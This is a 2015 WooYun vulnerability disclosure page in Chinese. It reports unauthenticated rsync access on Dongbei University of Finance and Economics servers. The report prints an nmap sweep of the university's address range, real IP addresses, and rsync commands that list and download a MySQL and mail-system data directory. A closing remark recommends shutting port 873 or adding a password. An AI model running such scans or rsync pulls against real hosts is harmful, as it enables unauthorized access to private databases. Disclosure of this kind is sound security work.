当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0140943

漏洞标题:东北财经大学一些重要信息泄漏

相关厂商:东北财经大学

漏洞作者: 路人甲

提交时间:2015-09-13 20:31

修复时间:2015-09-18 20:32

公开时间:2015-09-18 20:32

漏洞类型:系统/服务运维配置不当

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-13: 细节已通知厂商并且等待厂商处理中
2015-09-18: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

东北财经大学一些重要信息泄漏

详细说明:

nmap -n --open -p 873 www.dufe.edu.cn/24
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-09-13 17:18 CST
Nmap scan report for 202.199.160.186
Host is up (0.0020s latency).
PORT STATE SERVICE
873/tcp open rsync
Nmap scan report for 202.199.160.209
Host is up (0.0022s latency).
PORT STATE SERVICE
873/tcp open rsync
Nmap done: 256 IP addresses (67 hosts up) scanned in 4.29 seconds


root@kali:~# rsync 202.199.160.209:: -av
mysql
mysql_index
mysql_log
root@kali:~# rsync 202.199.160.209::mysql
drwx------ 4,096 2015/08/21 23:14:38 .
-rw-rw---- 4,332 2015/04/21 16:06:57 columba.dufe.edu.cn.err
-rw-rw---- 0 2014/10/14 10:48:37 columba.dufe.edu.cn.err-old
-rw-rw---- 268,435,456 2015/09/13 17:15:30 ib_logfile0
-rw-rw---- 268,435,456 2015/09/13 17:15:35 ib_logfile1
-rw-rw---- 27,262,976 2015/09/13 17:15:30 ibdata1
-rw-rw---- 19,845 2013/09/04 19:53:08 mail2.err
-rw-rw---- 1,073,742,071 2015/08/21 23:14:38 mysql-bin.000013
-rw-rw---- 778,411,172 2015/09/13 17:15:14 mysql-bin.000014
-rw-rw---- 38 2015/08/21 23:14:38 mysql-bin.index
drwxr-xr-x 4,096 2013/08/20 18:01:19 binlog
drwx------ 16,384 2014/11/06 14:56:27 eyou_mail
drwx------ 4,096 2013/07/18 19:12:10 mysql
drwx------ 4,096 2013/07/18 19:12:03 test


2015-09-13 19:49:24 的屏幕截图.png


可以下载,是一个邮件系统
下载之后发现分析不出什么,唉技术有限啊

漏洞证明:

如上

修复方案:

把873关了吧,或者加个密码也行

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-09-18 20:32

厂商回复:

最新状态:

暂无